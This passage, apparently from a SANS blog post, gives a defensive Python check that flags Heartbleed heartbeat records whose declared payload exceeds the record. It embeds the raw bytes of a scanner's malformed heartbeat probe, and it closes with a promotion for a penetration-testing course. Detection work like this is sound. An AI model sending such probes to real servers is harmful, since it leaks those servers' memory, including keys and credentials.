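Viewed from the defender’s side, the two records that script sends can be checked for the exact bounds violation the patched OpenSSL rejects: a heartbeat whose declared payload (plus header and minimum padding) does not fit inside its TLS record. This is an added example, not code from the post or from any of the tools named above; the well-formed heartbeat record is constructed, the other two byte strings are the ones quoted above.

```python
"""The bounds check that was missing in Heartbleed, run against the records
the seven-line script above sends.

Added example, not code from any tool named in this post. It parses a TLS
record header and the heartbeat message inside it (RFC 6520) and applies the
check the patched OpenSSL performs before answering: the 3-byte heartbeat
header, the declared payload and at least 16 bytes of padding must all fit
inside the record, otherwise the message is silently discarded.
WELLFORMED_HEARTBEAT is constructed; the other two are the bytes quoted above.
"""
import struct

TLS_HEARTBEAT = 0x18               # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 0x01, 0x02
MIN_PADDING = 16                   # RFC 6520: padding_length MUST be at least 16

# ClientHello and heartbeat request from the post (generated by Rahul Sasi's scanner)
CLIENT_HELLO = bytes.fromhex(
    "16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000")
MALFORMED_HEARTBEAT = bytes.fromhex("1803020003014000")   # 3-byte record claiming a 16384-byte payload
# Constructed well-formed request: 4-byte payload "deadbeef" plus 16 bytes of padding
WELLFORMED_HEARTBEAT = bytes.fromhex("1803020017" + "01" + "0004" + "deadbeef" + "00" * 16)


def parse_record(data):
    """Split one TLS record off the front of `data`.
    Returns (content_type, version, body, remaining_bytes)."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    ctype, version, length = struct.unpack("!BHH", data[:5])
    body = data[5:5 + length]
    if len(body) < length:
        raise ValueError("record body shorter than declared record length")
    return ctype, version, body, data[5 + length:]


def heartbeat_overread(body):
    """Bytes a vulnerable peer would copy from beyond the request when echoing it:
    declared payload minus what is actually present in the record (0 if it fits)."""
    _, payload_len = struct.unpack("!BH", body[:3])
    return max(0, payload_len - (len(body) - 3))


def check_heartbeat(body):
    """Apply the post-patch OpenSSL test to one heartbeat message body.
    Returns (accept, reason)."""
    if len(body) < 3:
        return False, "shorter than the 3-byte heartbeat header"
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return False, f"unknown heartbeat type {hb_type:#x}"
    # The fix: if (1 + 2 + payload + 16 > record length) discard silently
    if 1 + 2 + payload_len + MIN_PADDING > len(body):
        return False, (f"declared payload {payload_len} bytes cannot fit in a "
                       f"{len(body)}-byte record; a vulnerable server would leak "
                       f"{heartbeat_overread(body)} bytes")
    return True, f"payload {payload_len} bytes, padding {len(body) - 3 - payload_len} bytes"


def classify(data):
    """One-word verdict for the first record in `data`, as a detector would tag it."""
    ctype, _, body, _ = parse_record(data)
    if ctype != TLS_HEARTBEAT:
        return "not-heartbeat"
    accept, _ = check_heartbeat(body)
    return "ok" if accept else "malformed"


if __name__ == "__main__":
    for label, rec in [("ClientHello", CLIENT_HELLO), ("scanner heartbeat", MALFORMED_HEARTBEAT),
                       ("well-formed heartbeat", WELLFORMED_HEARTBEAT)]:
        ctype, _, body, _ = parse_record(rec)
        detail = check_heartbeat(body)[1] if ctype == TLS_HEARTBEAT else "not a heartbeat record"
        print(f"{label:<22} {classify(rec):<14} {detail}")
```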

Here are those 7 lines of code in action:

It is simple.  Python empowers penetration testers.  If you know how to use Python, you can go very quickly from a concept to working code.  SANS Python for Penetration Testers course, SEC573, is designed to teach you what you need to develop these kinds of tools on your own.  The course is self-paced with no prerequisites and will meet you where you are.   Even if you don’t have any programming background, the course will have you developing your own tools in no time!  The first two days cover all of the essentials of the language.  If you already know how to code, don’t worry.  You will NOT be bored.  Since this course is self-paced, you will sharpen your existing skills as well as develop new ones, through a series of self-guided pyWars challenges.  Then you will write four new penetration testing tools ready for use in your next engagement.  Finally, you will put your new tools and skills to the test in a team-based capture the flag event.  Python is awesome and the SANS Python for pen testers course is the perfect place to learn new Python skills.

–Mark Baggett
@MarkBaggett